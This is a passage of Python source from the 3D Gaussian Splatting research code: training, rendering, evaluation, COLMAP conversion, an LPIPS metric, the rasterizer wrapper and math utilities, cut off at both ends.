skip_train : bool, skip_test : bool): with torch.no_grad(): gaussians = GaussianModel(dataset.sh_degree) scene = Scene(dataset, gaussians, load_iteration=iteration, shuffle=False) bg_color = [1,1,1] if dataset.white_background else [0, 0, 0] background = torch.tensor(bg_color, dtype=torch.float32, device="cuda") if not skip_train: render_set(dataset.model_path, "train", scene.loaded_iter, scene.getTrainCameras(), gaussians, pipeline, background) if not skip_test: render_set(dataset.model_path, "test", scene.loaded_iter, scene.getTestCameras(), gaussians, pipeline, background) if __name__ == "__main__": # Set up command line argument parser parser = ArgumentParser(description="Testing script parameters") model = ModelParams(parser, sentinel=True) pipeline = PipelineParams(parser) parser.add_argument("--iteration", default=-1, type=int) parser.add_argument("--skip_train", action="store_true") parser.add_argument("--skip_test", action="store_true") parser.add_argument("--quiet", action="store_true") args = get_combined_args(parser) print("Rendering " + args.model_path) # Initialize system state (RNG) safe_state(args.quiet) render_sets(model.extract(args), args.iteration, pipeline.extract(args), args.skip_train, args.skip_test) File: full_eval.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. 
# # For inquiries contact [email protected] # import os from argparse import ArgumentParser mipnerf360_outdoor_scenes = ["bicycle", "flowers", "garden", "stump", "treehill"] mipnerf360_indoor_scenes = ["room", "counter", "kitchen", "bonsai"] tanks_and_temples_scenes = ["truck", "train"] deep_blending_scenes = ["drjohnson", "playroom"] parser = ArgumentParser(description="Full evaluation script parameters") parser.add_argument("--skip_training", action="store_true") parser.add_argument("--skip_rendering", action="store_true") parser.add_argument("--skip_metrics", action="store_true") parser.add_argument("--output_path", default="./eval") args, _ = parser.parse_known_args() all_scenes = [] all_scenes.extend(mipnerf360_outdoor_scenes) all_scenes.extend(mipnerf360_indoor_scenes) all_scenes.extend(tanks_and_temples_scenes) all_scenes.extend(deep_blending_scenes) if not args.skip_training or not args.skip_rendering: parser.add_argument('--mipnerf360', "-m360", required=True, type=str) parser.add_argument("--tanksandtemples", "-tat", required=True, type=str) parser.add_argument("--deepblending", "-db", required=True, type=str) args = parser.parse_args() if not args.skip_training: common_args = " --quiet --eval --test_iterations -1 " for scene in mipnerf360_outdoor_scenes: source = args.mipnerf360 + "/" + scene os.system("python train.py -s " + source + " -i images_4 -m " + args.output_path + "/" + scene + common_args) for scene in mipnerf360_indoor_scenes: source = args.mipnerf360 + "/" + scene os.system("python train.py -s " + source + " -i images_2 -m " + args.output_path + "/" + scene + common_args) for scene in tanks_and_temples_scenes: source = args.tanksandtemples + "/" + scene os.system("python train.py -s " + source + " -m " + args.output_path + "/" + scene + common_args) for scene in deep_blending_scenes: source = args.deepblending + "/" + scene os.system("python train.py -s " + source + " -m " + args.output_path + "/" + scene + common_args) if not args.skip_rendering: all_sources = [] for scene in mipnerf360_outdoor_scenes: all_sources.append(args.mipnerf360 + "/" + scene) for scene in mipnerf360_indoor_scenes: all_sources.append(args.mipnerf360 + "/" + scene) for scene in tanks_and_temples_scenes: all_sources.append(args.tanksandtemples + "/" + scene) for scene in deep_blending_scenes: all_sources.append(args.deepblending + "/" + scene) common_args = " --quiet --eval --skip_train" for scene, source in zip(all_scenes, all_sources): os.system("python render.py --iteration 7000 -s " + source + " -m " + args.output_path + "/" + scene + common_args) os.system("python render.py --iteration 30000 -s " + source + " -m " + args.output_path + "/" + scene + common_args) if not args.skip_metrics: scenes_string = "" for scene in all_scenes: scenes_string += "\"" + args.output_path + "/" + scene + "\" " os.system("python metrics.py -m " + scenes_string) File: convert.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # import os import logging from argparse import ArgumentParser import shutil # This Python script is based on the shell converter script provided in the MipNerF 360 repository. 
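# Descriptive note (summarizing the code below): the script expects raw images
# in <source_path>/input, runs COLMAP feature extraction, exhaustive matching
# and mapping into <source_path>/distorted/sparse, then undistorts into
# <source_path>/images and moves the sparse model to <source_path>/sparse/0;
# the optional --resize flag additionally writes images_2, images_4 and images_8.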
parser = ArgumentParser("Colmap converter") parser.add_argument("--no_gpu", action='store_true') parser.add_argument("--skip_matching", action='store_true') parser.add_argument("--source_path", "-s", required=True, type=str) parser.add_argument("--camera", default="OPENCV", type=str) parser.add_argument("--colmap_executable", default="", type=str) parser.add_argument("--resize", action="store_true") parser.add_argument("--magick_executable", default="", type=str) args = parser.parse_args() colmap_command = '"{}"'.format(args.colmap_executable) if len(args.colmap_executable) > 0 else "colmap" magick_command = '"{}"'.format(args.magick_executable) if len(args.magick_executable) > 0 else "magick" use_gpu = 1 if not args.no_gpu else 0 if not args.skip_matching: os.makedirs(args.source_path + "/distorted/sparse", exist_ok=True) ## Feature extraction feat_extracton_cmd = colmap_command + " feature_extractor "\ "--database_path " + args.source_path + "/distorted/database.db \ --image_path " + args.source_path + "/input \ --ImageReader.single_camera 1 \ --ImageReader.camera_model " + args.camera + " \ --SiftExtraction.use_gpu " + str(use_gpu) exit_code = os.system(feat_extracton_cmd) if exit_code != 0: logging.error(f"Feature extraction failed with code {exit_code}. Exiting.") exit(exit_code) ## Feature matching feat_matching_cmd = colmap_command + " exhaustive_matcher \ --database_path " + args.source_path + "/distorted/database.db \ --SiftMatching.use_gpu " + str(use_gpu) exit_code = os.system(feat_matching_cmd) if exit_code != 0: logging.error(f"Feature matching failed with code {exit_code}. Exiting.") exit(exit_code) ### Bundle adjustment # The default Mapper tolerance is unnecessarily large, # decreasing it speeds up bundle adjustment steps. mapper_cmd = (colmap_command + " mapper \ --database_path " + args.source_path + "/distorted/database.db \ --image_path " + args.source_path + "/input \ --output_path " + args.source_path + "/distorted/sparse \ --Mapper.ba_global_function_tolerance=0.000001") exit_code = os.system(mapper_cmd) if exit_code != 0: logging.error(f"Mapper failed with code {exit_code}. Exiting.") exit(exit_code) ### Image undistortion ## We need to undistort our images into ideal pinhole intrinsics. img_undist_cmd = (colmap_command + " image_undistorter \ --image_path " + args.source_path + "/input \ --input_path " + args.source_path + "/distorted/sparse/0 \ --output_path " + args.source_path + "\ --output_type COLMAP") exit_code = os.system(img_undist_cmd) if exit_code != 0: logging.error(f"Mapper failed with code {exit_code}. Exiting.") exit(exit_code) files = os.listdir(args.source_path + "/sparse") os.makedirs(args.source_path + "/sparse/0", exist_ok=True) # Copy each file from the source directory to the destination directory for file in files: if file == '0': continue source_file = os.path.join(args.source_path, "sparse", file) destination_file = os.path.join(args.source_path, "sparse", "0", file) shutil.move(source_file, destination_file) if(args.resize): print("Copying and resizing...") # Resize images. 
os.makedirs(args.source_path + "/images_2", exist_ok=True) os.makedirs(args.source_path + "/images_4", exist_ok=True) os.makedirs(args.source_path + "/images_8", exist_ok=True) # Get the list of files in the source directory files = os.listdir(args.source_path + "/images") # Copy each file from the source directory to the destination directory for file in files: source_file = os.path.join(args.source_path, "images", file) destination_file = os.path.join(args.source_path, "images_2", file) shutil.copy2(source_file, destination_file) exit_code = os.system(magick_command + " mogrify -resize 50% " + destination_file) if exit_code != 0: logging.error(f"50% resize failed with code {exit_code}. Exiting.") exit(exit_code) destination_file = os.path.join(args.source_path, "images_4", file) shutil.copy2(source_file, destination_file) exit_code = os.system(magick_command + " mogrify -resize 25% " + destination_file) if exit_code != 0: logging.error(f"25% resize failed with code {exit_code}. Exiting.") exit(exit_code) destination_file = os.path.join(args.source_path, "images_8", file) shutil.copy2(source_file, destination_file) exit_code = os.system(magick_command + " mogrify -resize 12.5% " + destination_file) if exit_code != 0: logging.error(f"12.5% resize failed with code {exit_code}. Exiting.") exit(exit_code) print("Done.") File: train.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # import os import torch from random import randint from utils.loss_utils import l1_loss, ssim from gaussian_renderer import render, network_gui import sys from scene import Scene, GaussianModel from utils.general_utils import safe_state import uuid from tqdm import tqdm from utils.image_utils import psnr from argparse import ArgumentParser, Namespace from arguments import ModelParams, PipelineParams, OptimizationParams try: from torch.utils.tensorboard import SummaryWriter TENSORBOARD_FOUND = True except ImportError: TENSORBOARD_FOUND = False def training(dataset, opt, pipe, testing_iterations, saving_iterations, checkpoint_iterations, checkpoint, debug_from): first_iter = 0 tb_writer = prepare_output_and_logger(dataset) gaussians = GaussianModel(dataset.sh_degree) scene = Scene(dataset, gaussians) gaussians.training_setup(opt) if checkpoint: (model_params, first_iter) = torch.load(checkpoint) gaussians.restore(model_params, opt) bg_color = [1, 1, 1] if dataset.white_background else [0, 0, 0] background = torch.tensor(bg_color, dtype=torch.float32, device="cuda") iter_start = torch.cuda.Event(enable_timing = True) iter_end = torch.cuda.Event(enable_timing = True) viewpoint_stack = None ema_loss_for_log = 0.0 progress_bar = tqdm(range(first_iter, opt.iterations), desc="Training progress") first_iter += 1 for iteration in range(first_iter, opt.iterations + 1): if network_gui.conn == None: network_gui.try_connect() while network_gui.conn != None: try: net_image_bytes = None custom_cam, do_training, pipe.convert_SHs_python, pipe.compute_cov3D_python, keep_alive, scaling_modifer = network_gui.receive() if custom_cam != None: net_image = render(custom_cam, gaussians, pipe, background, scaling_modifer)["render"] net_image_bytes = memoryview((torch.clamp(net_image, min=0, max=1.0) * 255).byte().permute(1, 2, 0).contiguous().cpu().numpy()) network_gui.send(net_image_bytes, dataset.source_path) if 
do_training and ((iteration < int(opt.iterations)) or not keep_alive): break except Exception as e: network_gui.conn = None iter_start.record() gaussians.update_learning_rate(iteration) # Every 1000 its we increase the levels of SH up to a maximum degree if iteration % 1000 == 0: gaussians.oneupSHdegree() # Pick a random Camera if not viewpoint_stack: viewpoint_stack = scene.getTrainCameras().copy() viewpoint_cam = viewpoint_stack.pop(randint(0, len(viewpoint_stack)-1)) # Render if (iteration - 1) == debug_from: pipe.debug = True bg = torch.rand((3), device="cuda") if opt.random_background else background render_pkg = render(viewpoint_cam, gaussians, pipe, bg) image, viewspace_point_tensor, visibility_filter, radii = render_pkg["render"], render_pkg["viewspace_points"], render_pkg["visibility_filter"], render_pkg["radii"] # Loss gt_image = viewpoint_cam.original_image.cuda() Ll1 = l1_loss(image, gt_image) loss = (1.0 - opt.lambda_dssim) * Ll1 + opt.lambda_dssim * (1.0 - ssim(image, gt_image)) loss.backward() iter_end.record() with torch.no_grad(): # Progress bar ema_loss_for_log = 0.4 * loss.item() + 0.6 * ema_loss_for_log if iteration % 10 == 0: progress_bar.set_postfix({"Loss": f"{ema_loss_for_log:.{7}f}"}) progress_bar.update(10) if iteration == opt.iterations: progress_bar.close() # Log and save training_report(tb_writer, iteration, Ll1, loss, l1_loss, iter_start.elapsed_time(iter_end), testing_iterations, scene, render, (pipe, background)) if (iteration in saving_iterations): print("\n[ITER {}] Saving Gaussians".format(iteration)) scene.save(iteration) # Densification if iteration < opt.densify_until_iter: # Keep track of max radii in image-space for pruning gaussians.max_radii2D[visibility_filter] = torch.max(gaussians.max_radii2D[visibility_filter], radii[visibility_filter]) gaussians.add_densification_stats(viewspace_point_tensor, visibility_filter) if iteration > opt.densify_from_iter and iteration % opt.densification_interval == 0: size_threshold = 20 if iteration > opt.opacity_reset_interval else None gaussians.densify_and_prune(opt.densify_grad_threshold, 0.005, scene.cameras_extent, size_threshold) if iteration % opt.opacity_reset_interval == 0 or (dataset.white_background and iteration == opt.densify_from_iter): gaussians.reset_opacity() # Optimizer step if iteration < opt.iterations: gaussians.optimizer.step() gaussians.optimizer.zero_grad(set_to_none = True) if (iteration in checkpoint_iterations): print("\n[ITER {}] Saving Checkpoint".format(iteration)) torch.save((gaussians.capture(), iteration), scene.model_path + "/chkpnt" + str(iteration) + ".pth") def prepare_output_and_logger(args): if not args.model_path: if os.getenv('OAR_JOB_ID'): unique_str=os.getenv('OAR_JOB_ID') else: unique_str = str(uuid.uuid4()) args.model_path = os.path.join("./output/", unique_str[0:10]) # Set up output folder print("Output folder: {}".format(args.model_path)) os.makedirs(args.model_path, exist_ok = True) with open(os.path.join(args.model_path, "cfg_args"), 'w') as cfg_log_f: cfg_log_f.write(str(Namespace(**vars(args)))) # Create Tensorboard writer tb_writer = None if TENSORBOARD_FOUND: tb_writer = SummaryWriter(args.model_path) else: print("Tensorboard not available: not logging progress") return tb_writer def training_report(tb_writer, iteration, Ll1, loss, l1_loss, elapsed, testing_iterations, scene : Scene, renderFunc, renderArgs): if tb_writer: tb_writer.add_scalar('train_loss_patches/l1_loss', Ll1.item(), iteration) tb_writer.add_scalar('train_loss_patches/total_loss', loss.item(), 
iteration) tb_writer.add_scalar('iter_time', elapsed, iteration) # Report test and samples of training set if iteration in testing_iterations: torch.cuda.empty_cache() validation_configs = ({'name': 'test', 'cameras' : scene.getTestCameras()}, {'name': 'train', 'cameras' : [scene.getTrainCameras()[idx % len(scene.getTrainCameras())] for idx in range(5, 30, 5)]}) for config in validation_configs: if config['cameras'] and len(config['cameras']) > 0: l1_test = 0.0 psnr_test = 0.0 for idx, viewpoint in enumerate(config['cameras']): image = torch.clamp(renderFunc(viewpoint, scene.gaussians, *renderArgs)["render"], 0.0, 1.0) gt_image = torch.clamp(viewpoint.original_image.to("cuda"), 0.0, 1.0) if tb_writer and (idx < 5): tb_writer.add_images(config['name'] + "_view_{}/render".format(viewpoint.image_name), image[None], global_step=iteration) if iteration == testing_iterations[0]: tb_writer.add_images(config['name'] + "_view_{}/ground_truth".format(viewpoint.image_name), gt_image[None], global_step=iteration) l1_test += l1_loss(image, gt_image).mean().double() psnr_test += psnr(image, gt_image).mean().double() psnr_test /= len(config['cameras']) l1_test /= len(config['cameras']) print("\n[ITER {}] Evaluating {}: L1 {} PSNR {}".format(iteration, config['name'], l1_test, psnr_test)) if tb_writer: tb_writer.add_scalar(config['name'] + '/loss_viewpoint - l1_loss', l1_test, iteration) tb_writer.add_scalar(config['name'] + '/loss_viewpoint - psnr', psnr_test, iteration) if tb_writer: tb_writer.add_histogram("scene/opacity_histogram", scene.gaussians.get_opacity, iteration) tb_writer.add_scalar('total_points', scene.gaussians.get_xyz.shape[0], iteration) torch.cuda.empty_cache() if __name__ == "__main__": # Set up command line argument parser parser = ArgumentParser(description="Training script parameters") lp = ModelParams(parser) op = OptimizationParams(parser) pp = PipelineParams(parser) parser.add_argument('--ip', type=str, default="127.0.0.1") parser.add_argument('--port', type=int, default=6009) parser.add_argument('--debug_from', type=int, default=-1) parser.add_argument('--detect_anomaly', action='store_true', default=False) parser.add_argument("--test_iterations", nargs="+", type=int, default=[7_000, 30_000]) parser.add_argument("--save_iterations", nargs="+", type=int, default=[7_000, 30_000]) parser.add_argument("--quiet", action="store_true") parser.add_argument("--checkpoint_iterations", nargs="+", type=int, default=[]) parser.add_argument("--start_checkpoint", type=str, default = None) args = parser.parse_args(sys.argv[1:]) args.save_iterations.append(args.iterations) print("Optimizing " + args.model_path) # Initialize system state (RNG) safe_state(args.quiet) # Start GUI server, configure and run training network_gui.init(args.ip, args.port) torch.autograd.set_detect_anomaly(args.detect_anomaly) training(lp.extract(args), op.extract(args), pp.extract(args), args.test_iterations, args.save_iterations, args.checkpoint_iterations, args.start_checkpoint, args.debug_from) # All done print("\nTraining complete.") File: lpipsPyTorch/__init__.py import torch from .modules.lpips import LPIPS def lpips(x: torch.Tensor, y: torch.Tensor, net_type: str = 'alex', version: str = '0.1'): r"""Function that measures Learned Perceptual Image Patch Similarity (LPIPS). Arguments: x, y (torch.Tensor): the input tensors to compare. net_type (str): the network type to compare the features: 'alex' | 'squeeze' | 'vgg'. Default: 'alex'. version (str): the version of LPIPS. Default: 0.1. 
""" device = x.device criterion = LPIPS(net_type, version).to(device) return criterion(x, y) File: lpipsPyTorch/modules/networks.py from typing import Sequence from itertools import chain import torch import torch.nn as nn from torchvision import models from .utils import normalize_activation def get_network(net_type: str): if net_type == 'alex': return AlexNet() elif net_type == 'squeeze': return SqueezeNet() elif net_type == 'vgg': return VGG16() else: raise NotImplementedError('choose net_type from [alex, squeeze, vgg].') class LinLayers(nn.ModuleList): def __init__(self, n_channels_list: Sequence[int]): super(LinLayers, self).__init__([ nn.Sequential( nn.Identity(), nn.Conv2d(nc, 1, 1, 1, 0, bias=False) ) for nc in n_channels_list ]) for param in self.parameters(): param.requires_grad = False class BaseNet(nn.Module): def __init__(self): super(BaseNet, self).__init__() # register buffer self.register_buffer( 'mean', torch.Tensor([-.030, -.088, -.188])[None, :, None, None]) self.register_buffer( 'std', torch.Tensor([.458, .448, .450])[None, :, None, None]) def set_requires_grad(self, state: bool): for param in chain(self.parameters(), self.buffers()): param.requires_grad = state def z_score(self, x: torch.Tensor): return (x - self.mean) / self.std def forward(self, x: torch.Tensor): x = self.z_score(x) output = [] for i, (_, layer) in enumerate(self.layers._modules.items(), 1): x = layer(x) if i in self.target_layers: output.append(normalize_activation(x)) if len(output) == len(self.target_layers): break return output class SqueezeNet(BaseNet): def __init__(self): super(SqueezeNet, self).__init__() self.layers = models.squeezenet1_1(True).features self.target_layers = [2, 5, 8, 10, 11, 12, 13] self.n_channels_list = [64, 128, 256, 384, 384, 512, 512] self.set_requires_grad(False) class AlexNet(BaseNet): def __init__(self): super(AlexNet, self).__init__() self.layers = models.alexnet(True).features self.target_layers = [2, 5, 8, 10, 12] self.n_channels_list = [64, 192, 384, 256, 256] self.set_requires_grad(False) class VGG16(BaseNet): def __init__(self): super(VGG16, self).__init__() self.layers = models.vgg16(weights=models.VGG16_Weights.IMAGENET1K_V1).features self.target_layers = [4, 9, 16, 23, 30] self.n_channels_list = [64, 128, 256, 512, 512] self.set_requires_grad(False) File: lpipsPyTorch/modules/utils.py from collections import OrderedDict import torch def normalize_activation(x, eps=1e-10): norm_factor = torch.sqrt(torch.sum(x ** 2, dim=1, keepdim=True)) return x / (norm_factor + eps) def get_state_dict(net_type: str = 'alex', version: str = '0.1'): # build url url = 'https://raw.githubusercontent.com/richzhang/PerceptualSimilarity/' \ + f'master/lpips/weights/v{version}/{net_type}.pth' # download old_state_dict = torch.hub.load_state_dict_from_url( url, progress=True, map_location=None if torch.cuda.is_available() else torch.device('cpu') ) # rename keys new_state_dict = OrderedDict() for key, val in old_state_dict.items(): new_key = key new_key = new_key.replace('lin', '') new_key = new_key.replace('model.', '') new_state_dict[new_key] = val return new_state_dict File: lpipsPyTorch/modules/lpips.py import torch import torch.nn as nn from .networks import get_network, LinLayers from .utils import get_state_dict class LPIPS(nn.Module): r"""Creates a criterion that measures Learned Perceptual Image Patch Similarity (LPIPS). Arguments: net_type (str): the network type to compare the features: 'alex' | 'squeeze' | 'vgg'. Default: 'alex'. version (str): the version of LPIPS. 
Default: 0.1. """ def __init__(self, net_type: str = 'alex', version: str = '0.1'): assert version in ['0.1'], 'v0.1 is only supported now' super(LPIPS, self).__init__() # pretrained network self.net = get_network(net_type) # linear layers self.lin = LinLayers(self.net.n_channels_list) self.lin.load_state_dict(get_state_dict(net_type, version)) def forward(self, x: torch.Tensor, y: torch.Tensor): feat_x, feat_y = self.net(x), self.net(y) diff = [(fx - fy) ** 2 for fx, fy in zip(feat_x, feat_y)] res = [l(d).mean((2, 3), True) for d, l in zip(diff, self.lin)] return torch.sum(torch.cat(res, 0), 0, True) File: gaussian_renderer/__init__.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # import torch import math from diff_gaussian_rasterization import GaussianRasterizationSettings, GaussianRasterizer from scene.gaussian_model import GaussianModel from utils.sh_utils import eval_sh def render(viewpoint_camera, pc : GaussianModel, pipe, bg_color : torch.Tensor, scaling_modifier = 1.0, override_color = None): """ Render the scene. Background tensor (bg_color) must be on GPU! """ # Create zero tensor. We will use it to make pytorch return gradients of the 2D (screen-space) means screenspace_points = torch.zeros_like(pc.get_xyz, dtype=pc.get_xyz.dtype, requires_grad=True, device="cuda") + 0 try: screenspace_points.retain_grad() except: pass # Set up rasterization configuration tanfovx = math.tan(viewpoint_camera.FoVx * 0.5) tanfovy = math.tan(viewpoint_camera.FoVy * 0.5) raster_settings = GaussianRasterizationSettings( image_height=int(viewpoint_camera.image_height), image_width=int(viewpoint_camera.image_width), tanfovx=tanfovx, tanfovy=tanfovy, bg=bg_color, scale_modifier=scaling_modifier, viewmatrix=viewpoint_camera.world_view_transform, projmatrix=viewpoint_camera.full_proj_transform, sh_degree=pc.active_sh_degree, campos=viewpoint_camera.camera_center, prefiltered=False, debug=pipe.debug ) rasterizer = GaussianRasterizer(raster_settings=raster_settings) means3D = pc.get_xyz means2D = screenspace_points opacity = pc.get_opacity # If precomputed 3d covariance is provided, use it. If not, then it will be computed from # scaling / rotation by the rasterizer. scales = None rotations = None cov3D_precomp = None if pipe.compute_cov3D_python: cov3D_precomp = pc.get_covariance(scaling_modifier) else: scales = pc.get_scaling rotations = pc.get_rotation # If precomputed colors are provided, use them. Otherwise, if it is desired to precompute colors # from SHs in Python, do it. If not, then SH -> RGB conversion will be done by rasterizer. shs = None colors_precomp = None if override_color is None: if pipe.convert_SHs_python: shs_view = pc.get_features.transpose(1, 2).view(-1, 3, (pc.max_sh_degree+1)**2) dir_pp = (pc.get_xyz - viewpoint_camera.camera_center.repeat(pc.get_features.shape[0], 1)) dir_pp_normalized = dir_pp/dir_pp.norm(dim=1, keepdim=True) sh2rgb = eval_sh(pc.active_sh_degree, shs_view, dir_pp_normalized) colors_precomp = torch.clamp_min(sh2rgb + 0.5, 0.0) else: shs = pc.get_features else: colors_precomp = override_color # Rasterize visible Gaussians to image, obtain their radii (on screen). 
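    # Descriptive note: means2D is the zero-valued screenspace_points tensor
    # created above; it is passed only so that autograd populates its gradients
    # with screen-space position information, which train.py then feeds to
    # add_densification_stats for the densification criteria.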
rendered_image, radii = rasterizer( means3D = means3D, means2D = means2D, shs = shs, colors_precomp = colors_precomp, opacities = opacity, scales = scales, rotations = rotations, cov3D_precomp = cov3D_precomp) # Those Gaussians that were frustum culled or had a radius of 0 were not visible. # They will be excluded from value updates used in the splitting criteria. return {"render": rendered_image, "viewspace_points": screenspace_points, "visibility_filter" : radii > 0, "radii": radii} File: gaussian_renderer/network_gui.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # import torch import traceback import socket import json from scene.cameras import MiniCam host = "127.0.0.1" port = 6009 conn = None addr = None listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM) def init(wish_host, wish_port): global host, port, listener host = wish_host port = wish_port listener.bind((host, port)) listener.listen() listener.settimeout(0) def try_connect(): global conn, addr, listener try: conn, addr = listener.accept() print(f"\nConnected by {addr}") conn.settimeout(None) except Exception as inst: pass def read(): global conn messageLength = conn.recv(4) messageLength = int.from_bytes(messageLength, 'little') message = conn.recv(messageLength) return json.loads(message.decode("utf-8")) def send(message_bytes, verify): global conn if message_bytes != None: conn.sendall(message_bytes) conn.sendall(len(verify).to_bytes(4, 'little')) conn.sendall(bytes(verify, 'ascii')) def receive(): message = read() width = message["resolution_x"] height = message["resolution_y"] if width != 0 and height != 0: try: do_training = bool(message["train"]) fovy = message["fov_y"] fovx = message["fov_x"] znear = message["z_near"] zfar = message["z_far"] do_shs_python = bool(message["shs_python"]) do_rot_scale_python = bool(message["rot_scale_python"]) keep_alive = bool(message["keep_alive"]) scaling_modifier = message["scaling_modifier"] world_view_transform = torch.reshape(torch.tensor(message["view_matrix"]), (4, 4)).cuda() world_view_transform[:,1] = -world_view_transform[:,1] world_view_transform[:,2] = -world_view_transform[:,2] full_proj_transform = torch.reshape(torch.tensor(message["view_projection_matrix"]), (4, 4)).cuda() full_proj_transform[:,1] = -full_proj_transform[:,1] custom_cam = MiniCam(width, height, fovy, fovx, znear, zfar, world_view_transform, full_proj_transform) except Exception as e: print("") traceback.print_exc() raise e return custom_cam, do_training, do_shs_python, do_rot_scale_python, keep_alive, scaling_modifier else: return None, None, None, None, None, None File: utils/general_utils.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. 
# # For inquiries contact [email protected] # import torch import sys from datetime import datetime import numpy as np import random def inverse_sigmoid(x): return torch.log(x/(1-x)) def PILtoTorch(pil_image, resolution): resized_image_PIL = pil_image.resize(resolution) resized_image = torch.from_numpy(np.array(resized_image_PIL)) / 255.0 if len(resized_image.shape) == 3: return resized_image.permute(2, 0, 1) else: return resized_image.unsqueeze(dim=-1).permute(2, 0, 1) def get_expon_lr_func( lr_init, lr_final, lr_delay_steps=0, lr_delay_mult=1.0, max_steps=1000000 ): """ Copied from Plenoxels Continuous learning rate decay function. Adapted from JaxNeRF The returned rate is lr_init when step=0 and lr_final when step=max_steps, and is log-linearly interpolated elsewhere (equivalent to exponential decay). If lr_delay_steps>0 then the learning rate will be scaled by some smooth function of lr_delay_mult, such that the initial learning rate is lr_init*lr_delay_mult at the beginning of optimization but will be eased back to the normal learning rate when steps>lr_delay_steps. :param conf: config subtree 'lr' or similar :param max_steps: int, the number of steps during optimization. :return HoF which takes step as input """ def helper(step): if step < 0 or (lr_init == 0.0 and lr_final == 0.0): # Disable this parameter return 0.0 if lr_delay_steps > 0: # A kind of reverse cosine decay. delay_rate = lr_delay_mult + (1 - lr_delay_mult) * np.sin( 0.5 * np.pi * np.clip(step / lr_delay_steps, 0, 1) ) else: delay_rate = 1.0 t = np.clip(step / max_steps, 0, 1) log_lerp = np.exp(np.log(lr_init) * (1 - t) + np.log(lr_final) * t) return delay_rate * log_lerp return helper def strip_lowerdiag(L): uncertainty = torch.zeros((L.shape[0], 6), dtype=torch.float, device="cuda") uncertainty[:, 0] = L[:, 0, 0] uncertainty[:, 1] = L[:, 0, 1] uncertainty[:, 2] = L[:, 0, 2] uncertainty[:, 3] = L[:, 1, 1] uncertainty[:, 4] = L[:, 1, 2] uncertainty[:, 5] = L[:, 2, 2] return uncertainty def strip_symmetric(sym): return strip_lowerdiag(sym) def build_rotation(r): norm = torch.sqrt(r[:,0]*r[:,0] + r[:,1]*r[:,1] + r[:,2]*r[:,2] + r[:,3]*r[:,3]) q = r / norm[:, None] R = torch.zeros((q.size(0), 3, 3), device='cuda') r = q[:, 0] x = q[:, 1] y = q[:, 2] z = q[:, 3] R[:, 0, 0] = 1 - 2 * (y*y + z*z) R[:, 0, 1] = 2 * (x*y - r*z) R[:, 0, 2] = 2 * (x*z + r*y) R[:, 1, 0] = 2 * (x*y + r*z) R[:, 1, 1] = 1 - 2 * (x*x + z*z) R[:, 1, 2] = 2 * (y*z - r*x) R[:, 2, 0] = 2 * (x*z - r*y) R[:, 2, 1] = 2 * (y*z + r*x) R[:, 2, 2] = 1 - 2 * (x*x + y*y) return R def build_scaling_rotation(s, r): L = torch.zeros((s.shape[0], 3, 3), dtype=torch.float, device="cuda") R = build_rotation(r) L[:,0,0] = s[:,0] L[:,1,1] = s[:,1] L[:,2,2] = s[:,2] L = R @ L return L def safe_state(silent): old_f = sys.stdout class F: def __init__(self, silent): self.silent = silent def write(self, x): if not self.silent: if x.endswith("\n"): old_f.write(x.replace("\n", " [{}]\n".format(str(datetime.now().strftime("%d/%m %H:%M:%S"))))) else: old_f.write(x) def flush(self): old_f.flush() sys.stdout = F(silent) random.seed(0) np.random.seed(0) torch.manual_seed(0) torch.cuda.set_device(torch.device("cuda:0")) File: utils/image_utils.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. 
# # For inquiries contact [email protected] # import torch def mse(img1, img2): return (((img1 - img2)) ** 2).view(img1.shape[0], -1).mean(1, keepdim=True) def psnr(img1, img2): mse = (((img1 - img2)) ** 2).view(img1.shape[0], -1).mean(1, keepdim=True) return 20 * torch.log10(1.0 / torch.sqrt(mse)) File: utils/sh_utils.py # Copyright 2021 The PlenOctree Authors. # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. import torch C0 = 0.28209479177387814 C1 = 0.4886025119029199 C2 = [ 1.0925484305920792, -1.0925484305920792, 0.31539156525252005, -1.0925484305920792, 0.5462742152960396 ] C3 = [ -0.5900435899266435, 2.890611442640554, -0.4570457994644658, 0.3731763325901154, -0.4570457994644658, 